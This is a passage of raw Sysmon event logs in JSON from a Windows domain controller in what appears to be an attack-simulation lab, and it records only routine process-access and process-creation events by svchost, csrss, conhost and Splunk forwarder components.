{"EventTime":"2020-08-01 05:46:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2337,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:57.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:57.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2338,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:57.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:57.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2339,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:57.453\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01D1-5F25-0000-00105F1D0400}\r\nTargetProcessId: 3340\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:57.453","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01D1-5F25-0000-00105F1D0400}","TargetProcessId":"3340","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2340,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:57.594\r\nSourceProcessGUID: {A837DB8D-01D1-5F25-0000-00105F1D0400}\r\nSourceProcessId: 3340\r\nSourceThreadId: 3376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:57.594","SourceProcessGUID":"{A837DB8D-01D1-5F25-0000-00105F1D0400}","SourceProcessId":"3340","SourceThreadId":"3376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2341,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.130\r\nProcessGuid: {A837DB8D-01D2-5F25-0000-00103D1F0400}\r\nProcessId: 3836\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.130","ProcessGuid":"{A837DB8D-01D2-5F25-0000-00103D1F0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2342,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.312\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01D2-5F25-0000-00103D1F0400}\r\nTargetProcessId: 3836\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.312","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01D2-5F25-0000-00103D1F0400}","TargetProcessId":"3836","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2343,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.312\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01D2-5F25-0000-00103D1F0400}\r\nTargetProcessId: 3836\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.312","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01D2-5F25-0000-00103D1F0400}","TargetProcessId":"3836","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2344,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.312\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.312","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2345,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.312\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.312","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\n